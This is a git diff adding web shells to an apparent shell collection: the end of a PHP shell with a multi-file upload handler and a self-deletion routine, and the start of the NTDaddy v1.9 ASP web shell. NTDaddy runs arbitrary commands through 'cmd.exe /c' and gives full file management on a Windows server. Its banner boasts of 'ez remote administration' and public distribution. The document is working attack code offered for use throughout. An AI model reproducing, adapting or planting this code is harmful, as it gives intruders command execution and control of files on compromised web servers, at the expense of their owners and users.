+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile1</i><br>";}
+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile2</i><br>";}
+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile20</i><br>";}
+}
+
+exit;
+break;
+case "selfremover":
+ print "<tr><td>";
+print "<font color=red face=verdana size=1>Òû óâåğåí, ÷òî õî÷åø óäàëèòü ıòîò øåëë ñ ñåğâåğà ?<br>
+<a href='$php_self?p=yes'>Äà, õî÷ó</a> | <a href='$php_self?'>Íåò, ïóñòü åùå ïîáóäåò</a><br>
+Áóäåì óäàëÿòü: <u>";
+$path=__FILE__;
+print $path;
+print " </u>?</td></tr></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="Ôàéë íåâîçìîæíî óäàëèòü!!!";
+print "<tr><td><font color=red>Ôàéë $path íå óäàëåí !</td></tr>";
+}else{$hmm="Óäàëåí";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+break;
+
+
+?>
+
+
+
diff --git a/138shell/N/NT Addy.asp.txt b/138shell/N/NT Addy.asp.txt
new file mode 100644
index 0000000..bbcba0a
--- /dev/null
+++ b/138shell/N/NT Addy.asp.txt	
@@ -0,0 +1,1012 @@
+<!--
+_______________________________________
+|NTDaddy v1.9 by obzerve of fux0r inc.|
+|=====================================|
+|Vol.1:_Art.19:_Silent_Tactics_Archive|
+|******! PUBLIC ! DISTRIBUTION !******|
+|-------------------------------------|
+|    Welcome to the world of ez remote|
+|administration made possible by your |
+|friends at fux0r inc. NTDaddy is the |
+|most kickass WinNT CGI ninja commando|
+|tool you've seen yet. Refer to the   |
+|included read me of the original pub |
+|distribution for details. Don't just |
+|give it out, make people look for it.|
+|And dont be a fuckin cock choking    |
+|gutter slut and try to pass it off as|
+|your own. Because if you do, you suck|
+|ass. Also to avoid hipocrisy, yes a  |
+|small snippet was borrowed for a few |
+|parts here and there but for the     |
+|majority is original code by me,     |
+|obzerve of fux0r inc. Anyway if you  |
+|find something that looks 'built-on',|
+|i just made it better, you know how  |
+|it is...              oh well, enjoy!|
+|-------------------------------------|
+|     -obzerve : mr_o@ihateclowns.com |
+=======================================
+-->
+<%@ Language=VBScript %>
+<%Dim oScript
+Dim oScriptNet
+Dim oFileSys, oFile
+Dim szCMD, szTempFile
+On Error Resume Next
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+szCMD = Request.Form(".CMD")
+If (szCMD <> "") Then
+szTempFile = "C:\" & oFileSys.GetTempName( )
+Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+End If%>
+<% if request.form("flag")=""then %>
+<html>
+<head>
+<title>|[NTDaddy v1.9 - obzerve | fux0r inc.]</title>
+<%
+'Commands
+dim fs,f
+dim FilePath,FolderPath,FileTo,Cmd
+dim selFolder,FolderTo
+dim Tempmsg
+dim TempAtt
+dim TextOutput,TextWrite,TextFile,lblioMode,lblFormat,TextCreateFormat
+Const ForReading = 1, ForWriting = 2, ForAppending = 3
+Set fs = CreateObject("Scripting.FileSystemObject")
+FilePath=Request.Form("FileName")
+FolderPath=Request.Form("FolderPath")
+selFolder=Request.Form("FolderName")
+FolderTo=Request.form("CopyFolderTo")
+FileTo=Request.Form("CopyFileTo")
+Cmd=Request.Form("cmdOption")
+TextCmd=Request.form("cmdtxtFileOption")
+Select case Cmd
+case "DeleteFile"       
+fs.deletefile FilePath,TRUE
+response.write("File: " & FilePath & " has been deleted.")
+case "DeleteFolder"     
+fs.deletefolder selFolder,TRUE
+response.write("Folder: " & selFolder & " has been deleted.")
+FolderPath=Request.form("RefreshFolderPath")
+case "CopyFile"
+fs.CopyFile FilePath,FileTo, TRUE
+response.write("File: " & FilePath & " has been copied to " & FileTo & ".")
+case "CopyFolder"
+fs.CopyFolder selFolder,FolderTo, TRUE
+response.write("Folder: " & selFolder & " has been copied to " & FolderTo & ".")
+case "SetFileAttributes"
+on error resume next
+if FilePath <> "" then
+Set f = fs.GetFile(FilePath)
+select case f.attributes
+case 0
+FileAttributes = "Normal"
+case 1
+FileAttributes = "Read Only"
+case 2
+FileAttributes = "Hidden"
+case 3  'Extra
+FileAttributes = "Read Only, Hidden"
+case 4
+FileAttributes = "System"
+case 7  'Extra
+FileAttributes = "Read Only, Hidden, System"
+case 8
+FileAttributes = "Volume"
+case 16
+FileAttributes = "Directory"
+case 19
+FileAttributes = "Read Only, Hidden, Directoy"
+case 23
+FileAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FileAttributes = "Archive"
+case 33 'Extra
+FileAttributes = "Read Only, Archive"
+case 34 'Extra
+FileAttributes = "Hidden, Archive"
+case 38 'Extra
+FileAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FileAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FileAttributes = "Directory, Archive"
+case 64
+FileAttributes = "Alias"
+case 128
+FileAttributes = "Compressed"
+case else
+FileAttributes = f.attributes
+end select
+end if  
+response.write("<form name=frmFileAttributes action=ntdaddy.asp method=post>")
+response.write("<input type=hidden name=FileName Value=" & chr(34) & FilePath & chr(34) & ">")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & ">")
+response.write("<center><Table border=5 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>File Name: " & f.name & "</td>")
+response.write("<td rowspan=5><center><u><b>Set New Attributes:</b></u></center>")
+response.write("<input type=checkbox name=FileAttribute1 value=0 checked>Normal")
+response.write("<br><input type=checkbox name=FileAttribute2 value=1>Read Only")
+response.write("<br><input type=checkbox name=FileAttribute3 value=2>Hidden")
+response.write("<br><input type=checkbox name=FileAttribute4 value=4>System")
+response.write("<br><input type=checkbox name=FileAttribute5 value=8>Volume")
+response.write("<br><input type=checkbox name=FileAttribute6 value=16>Directory")
+response.write("<br><input type=checkbox name=FileAttribute7 value=32>Archive")
+response.write("<br><input type=checkbox name=FileAttribute8 value=64>Alias")
+response.write("<br><input type=checkbox name=FileAttribute9 value=128>Compressed")
+response.write("<br><center><input type=submit name=cmdOption value=ApplyFileAttributes></center>")
+response.write("</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Type of File: " & f.type & "</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Location: " & f.path)
+response.write("<br>Size: " & FormatNumber(f.size/1024, 2)  & "KB  (" & f.size & " bytes)</td></tr>")
+if f.DateCreated = "" then
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: ----")
+else
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: " & f.DateCreated)
+end if
+if f.DateLastAccessed = "" then
+response.write("<br>Modified: ----")
+else
+response.write("<br>Modified: " & f.DateLastAccessed)
+end if
+if f.DateLastModified = "" then
+response.write("<br>Accessed: ----</td></tr>")
+else
+response.write("<br>Accessed: " & f.DateLastModified & "</td></tr>")
+end if
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Attributes: " & FileAttributes & "</td></tr>")
+response.write("</table></center></form>")
+case "SetFolderAttributes"
+on error resume next
+FolderPath=Request.form("RefreshFolderPath")
+if selFolder <> "" then
+Set f = fs.Getfolder(selFolder)
+select case f.attributes
+case 0
+FolderAttributes = "Normal"
+case 1
+FolderAttributes = "Read Only"
+case 2
+FolderAttributes = "Hidden"
+case 3  'Extra
+FolderAttributes = "Read Only, Hidden"
+case 4
+FolderAttributes = "System"
+case 7  'Extra
+FolderAttributes = "Read Only, Hidden, System"
+case 8
+FolderAttributes = "Volume"
+case 16
+FolderAttributes = "Directory"
+case 17 'Extra
+FolderAttributes = "Read Only, Directory"
+case 18 'Extra
+FolderAttributes = "Hidden, Directory"
+case 19
+FolderAttributes = "Read Only, Hidden, Directoy"
+case 20 'Extra
+FolderAttributes = "System, Directory"
+case 22 'Extra
+FolderAttributes = "Hidden, System. Directory"
+case 23
+FolderAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FolderAttributes = "Archive"
+case 33 'Extra
+FolderAttributes = "Read Only, Archive"
+case 34 'Extra
+FolderAttributes = "Hidden, Archive"
+case 38 'Extra
+FolderAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FolderAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FolderAttributes = "Directory, Archive"
+case 64
+FolderAttributes = "Alias"
+case 128
+FolderAttributes = "Compressed"
+case else
+FolderAttributes = f1.attributes
+end select
+end if  
+response.write("<form name=frmFolderAttributes action=ntdaddy.asp method=post>")
+response.write("<input type=hidden name=FolderName Value=" & chr(34) & selFolder & chr(34) & ">")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & ">")
+response.write("<center><Table border=5 cellpadding=3 cellspacing=1 bordercolor=#ffffff>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Folder Name: " & f.name & "</td>")
+response.write("<td rowspan=5><center><u><b>Set New Attributes:</b></u></center>")
+response.write("<input type=checkbox name=FolderAttribute1 value=0 checked>Normal")
+response.write("<br><input type=checkbox name=FolderAttribute2 value=1>Read Only")
+response.write("<br><input type=checkbox name=FolderAttribute3 value=2>Hidden")
+response.write("<br><input type=checkbox name=FolderAttribute4 value=4>System")
+response.write("<br><input type=checkbox name=FolderAttribute5 value=8>Volume")
+response.write("<br><input type=checkbox name=FolderAttribute6 value=16>Directory")
+response.write("<br><input type=checkbox name=FolderAttribute7 value=32>Archive")
+response.write("<br><input type=checkbox name=FolderAttribute8 value=64>Alias")
+response.write("<br><input type=checkbox name=FolderAttribute9 value=128>Compressed")
+response.write("<br><center><input type=submit name=cmdOption value=ApplyFolderAttributes></center>")
+response.write("</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Type of Folder: " & f.type & "</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Location: " & f.path)
+response.write("<br>Size: " & FormatNumber(f.size/1024, 2)  & "KB  (" & f.size & " bytes)</td></tr>")
+if f.DateCreated = "" then
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: ----")
+else
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: " & f.DateCreated)
+end if
+if f.DateLastAccessed = "" then
+response.write("<br>Modified: ----")
+else
+response.write("<br>Modified: " & f.DateLastAccessed)
+end if
+if f.DateLastModified = "" then
+response.write("<br>Accessed: ----</td></tr>")
+else
+response.write("<br>Accessed: " & f.DateLastModified & "</td></tr>")
+end if
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Attributes: " & FolderAttributes & "</td></tr>")
+response.write("</table></center></form>")
+case "OpenTextFile"
+If FilePath <> "" then
+lblioMode=Request.form("optiomode")
+lblFormat=request.form("optformat")
+set TextFile = fs.OpenTextFile (FilePath, lblioMode, lblFormat)
+TextOutput = TextFile.ReadAll   
+'TextOutput=""
+'Do While TextFile.AtEndOfStream <> True
+'       TextOutput = TextOutput & TextFile.ReadLine
+'Loop
+TextFile.close
+else
+FilePath = FolderPath
+end if
+response.write("<form name=frmTextFile action=ntdaddy.asp method=post>")
+response.write("<center><table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff width=100% height=100% >")
+response.write("<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOption value=SaveAs><input type=text size=77 name=FileName value=" & chr(34) & FilePath & chr(34) & "><select name=optUnicode><option value=FALSE>ASCII <option value=TRUE>Unicode</select></td></tr>")
+response.write("<tr><td bgcolor=#ffffff><center><textarea name=txtFile rows=20 cols=85>" & TextOutput & "</textarea></center></td></tr>")
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write("<ERROR: THIS IS NOT A TEXT FILE>")
+response.write(chr(13))
+response.write("<FilePath: " & FilePath & ">")
+response.write(chr(13))
+response.write("<ioMode: " & lblioMode & ">")
+response.write(chr(13))
+response.write("<Format: " & lblFormat & ">")
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write("<tr><td><input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & "></td></tr>")
+response.write("</table></center><p>") 
+case "ApplyFileAttributes"
+TempAtt=int(Request.form("FileAttribute1"))
+TempAtt=TempAtt + int(Request.form("FileAttribute2"))
+TempAtt=TempAtt + int(Request.form("FileAttribute3"))
+TempAtt=TempAtt + int(Request.form("FileAttribute4"))
+TempAtt=TempAtt + int(Request.form("FileAttribute5"))
+TempAtt=TempAtt + int(Request.form("FileAttribute6"))
+TempAtt=TempAtt + int(Request.form("FileAttribute7"))
+TempAtt=TempAtt + int(Request.form("FileAttribute8"))
+TempAtt=TempAtt + int(Request.form("FileAttribute9"))
+Set f = fs.GetFile(FilePath)
+f.attributes=int(TempAtt)
+response.write("File: " & FilePath & " attributes have been changed.")
+case "ApplyFolderAttributes"
+FolderPath=Request.form("RefreshFolderPath")
+TempAtt=int(Request.form("FolderAttribute1"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute2"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute3"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute4"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute5"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute6"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute7"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute8"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute9"))
+Set f = fs.Getfolder(selFolder)
+f.attributes=int(TempAtt)
+response.write("Folder: " & selFolder & " attributes have been changed.")
+end select
+Select Case TextCmd
+case "SaveAs"
+TextWrite = Request.form("txtFile")
+TextCreateFormat = Request.form("optUnicode")
+if textcreateformat = "TRUE" then
+tempmsg="Unicode"
+else
+tempmsg="ASCII"
+end if
+Set TextFile = fs.CreateTextFile(FilePath, True,TextCreateFormat)
+TextFile.Write TextWrite
+TextFile.Close
+response.write("File: " & FilePath & " Format: " & tempmsg & " has been saved.")
+end select
+%>
+<%
+Public CurrentPath
+Function ShowDriveLetters()
+on error resume next
+Dim fs, d, dc, t
+dim isReadyColor,TempSize,ShowDriveInfo
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set dc = fs.Drives
+ShowDriveInfo=Request.Form("chkShowDriveInfo")
+response.write("<form name=lstDrives action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+if showdriveinfo="TRUE" then
+response.write("<tr colspan=8><td align=center colspan=8 bgcolor=#F8F8FF><font color=#000000><input type=checkbox name=chkShowDriveInfo value=TRUE> Show Drive Info  </td></tr>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>File System</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Serial #</u><b></td>")
+else
+response.write("<tr colspan=2><td align=center colspan=2 bgcolor=#f8f8ff><font color=#000000><input type=checkbox name=chkShowDriveInfo value=TRUE>Show Drive Info</td></tr>")
+end if
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Type</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Drive</u><b></td>")
+if showdriveinfo="TRUE" then
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Volume Name</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Share Name</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Free Space</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Total Size</u><b></td>")
+end if
+response.write("</tr>")
+For Each d in dc
+Select Case d.DriveType
+Case 0: t = "Unknown"
+Case 1: t = "Removable"
+Case 2: t = "Fixed"
+Case 3: t = "Network"
+Case 4: t = "CD-ROM"
+Case 5: t = "RAM Disk"
+End Select
+if showdriveinfo="TRUE" then
+if d.isReady then
+response.write("<TR bgcolor=#000000>")
+else
+response.write("<TR bgcolor=#191970>")
+end if
+if d.filesystem = "" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.filesystem & "</td>")
+end if
+if d.SerialNumber = "" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.SerialNumber & "</td>")
+end if
+else
+response.write("<TR>")
+end if
+response.write("<td align=center>" & t & "</td>")
+response.write("<td align=center><input type=submit name=FolderPath value=" & d.driveletter & ":\></td>")
+if showdriveinfo="TRUE" then
+if d.volumename="" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.volumename & "</td>")
+end if
+if d.sharename="" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.sharename & "</td>")
+end if
+str=""
+str=str & d.driveletter
+str=str & ":"
+'response.write(str)
+if d.isready then
+freespace = (d.AvailableSpace / 1048576)
+set sp=fs.getdrive(str)
+response.write("<td align=center>" & Round(freespace,1) & " MB</td>")
+else
+response.write("<td align=center>....</td>")
+end if
+str=""
+str=str & d.driveletter
+str=str & ":"
+'response.write(str)
+if d.isready then
+totalspace = (d.TotalSize / 1048576)
+set sp=fs.getdrive(str)
+response.write("<td align=center>" & Round(totalspace,1) & " MB</td>")
+else
+response.write("<td align=center>....</td>")
+end if
+end if
+Next
+response.write("</tr>")
+response.write("</tr></table>")
+response.write("</form>")
+End Function
+Function ShowFolderNames()
+on error resume next
+Dim fs, f, f1, s, sf ,FP
+dim ShowFolderInfo,FolderAttributes 
+ShowFolderInfo=request.form("chkShowFolderInfo")
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+IP=chr(34) & IP & chr(34)
+end if
+CurrentPath=FP
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set f = fs.GetFolder(FP)
+Set sf = f.SubFolders
+response.write("<form name=lstFolders action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=Submit name=FolderPath value=RefreshFolder></td></tr>")
+response.write("<input type=hidden name=RefreshFolderPath value=" & chr(34) &  fp & chr(34) & ">")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=checkbox name=chkShowFolderInfo value=TRUE> Show Folder Info</td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=DeleteFolder><br><input type=submit name=cmdOption Value=CopyFolder> to <input type=text name=CopyFolderTo></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=SetFolderAttributes>")
+if showfolderinfo="TRUE" then
+response.write("<TR>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Folder</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Size</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Type</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Attributes</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Created</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Accessed</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Modified</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Name</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Path</u></b></td>")
+response.write("</tr>")
+end if
+For Each f1 in sf
+if showfolderinfo="TRUE" then
+response.write("<tr>")
+response.write("<td><input type=radio name=FolderName value=" & chr(34) & FP & f1.name & chr(34) & "><Input type=submit name=FolderPath value=" & chr(34) & FP & F1.name & "\" & chr(34) & "></td>")
+response.write("<td align=center nowrap>" & FormatNumber(f1.size/1024, 0)  & " kb</td>")
+response.write("<td align=center nowrap>" & f1.type & "</td>")
+folderattributes="...."
+select case f1.attributes
+case 0
+FolderAttributes = "Normal"
+case 1
+FolderAttributes = "Read Only"
+case 2
+FolderAttributes = "Hidden"
+case 3  'Extra
+FolderAttributes = "Read Only, Hidden"
+case 4
+FolderAttributes = "System"
+case 7  'Extra
+FolderAttributes = "Read Only, Hidden, System"
+case 8
+FolderAttributes = "Volume"
+case 16
+FolderAttributes = "Directory"
+case 17 'Extra
+FolderAttributes = "Read Only, Directory"
+case 18 'Extra
+FolderAttributes = "Hidden, Directory"
+case 19
+FolderAttributes = "Read Only, Hidden, Directoy"
+case 20 'Extra
+FolderAttributes = "System, Directory"
+case 22 'Extra
+FolderAttributes = "Hidden, System. Directory"
+case 23
+FolderAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FolderAttributes = "Archive"
+case 33 'Extra
+FolderAttributes = "Read Only, Archive"
+case 34 'Extra
+FolderAttributes = "Hidden, Archive"
+case 38 'Extra
+FolderAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FolderAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FolderAttributes = "Directory, Archive"
+case 64
+FolderAttributes = "Alias"
+case 128
+FolderAttributes = "Compressed"
+case else
+FolderAttributes = f1.attributes
+end select
+response.write("<td align=center nowrap>" & FolderAttributes & "</td>")
+if f1.datecreated = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datecreated & "</td>")
+end if
+if f1.datelastaccessed = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastaccessed & "</td>")
+end if
+if f1.datelastmodified = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastmodified & "</td>")
+end if
+response.write("<td align=center nowrap>" & f1.shortname & "</td>")
+response.write("<td align=center nowrap>" & f1.shortpath & "\</td></tr>")
+else
+response.write("<tr><td><input type=radio name=FolderName value=" & chr(34) & FP & f1.name & chr(34) & "><Input type=submit name=FolderPath value=" & chr(34) & FP & F1.name & "\" & chr(34) & "></td></tr>")
+end if
+Next
+response.write("</table>")
+response.write("</form>")
+End Function
+Function ShowFileNames()
+on error resume next
+Dim fs, f, f1, fc, FP
+dim ShowFileInfo,FileAttributes,ShowPrefix
+ShowPrefix=request.form("txtShowPrefix")
+ShowFileInfo=Request.form("chkShowFileInfo")
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+IP=chr(34) & IP & chr(34)
+end if
+CurrentPath=FP
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set f = fs.GetFolder(FP)
+Set fc = f.Files
+response.write("<form name=lstFiles action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=submit value=RefreshFiles> <input type=checkbox name=chkShowFileInfo value=TRUE> Show File Info &<br>Show Only:  <input type=text name=txtShowPrefix value= ></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=DeleteFile><input type=submit name=cmdOption Value=CopyFile> to <input type=text name=CopyFileTo></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=OpenTextFile><select name=optioMode><option value=" & chr(34) & "1" & chr(34) & ">For Reading <option value="& chr(34) & "2" & chr(34) & ">For Writing <option value=" & chr(34) & "8" & chr(34) & ">For Appending</select><select name=optformat><option value=" & chr(34) & "-2" & chr(34) & ">System Default <option value=" & chr(34) & "-1" & chr(34) & ">Unicode <option value=" & chr(34) & "0" & chr(34) & ">ASCII</select></td>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=SetFileAttributes>")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & fp & chr(34) & "></tr>")
+if showfileinfo="TRUE" then
+response.write("<TR>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>File</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Size</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Type</u></b></td>")
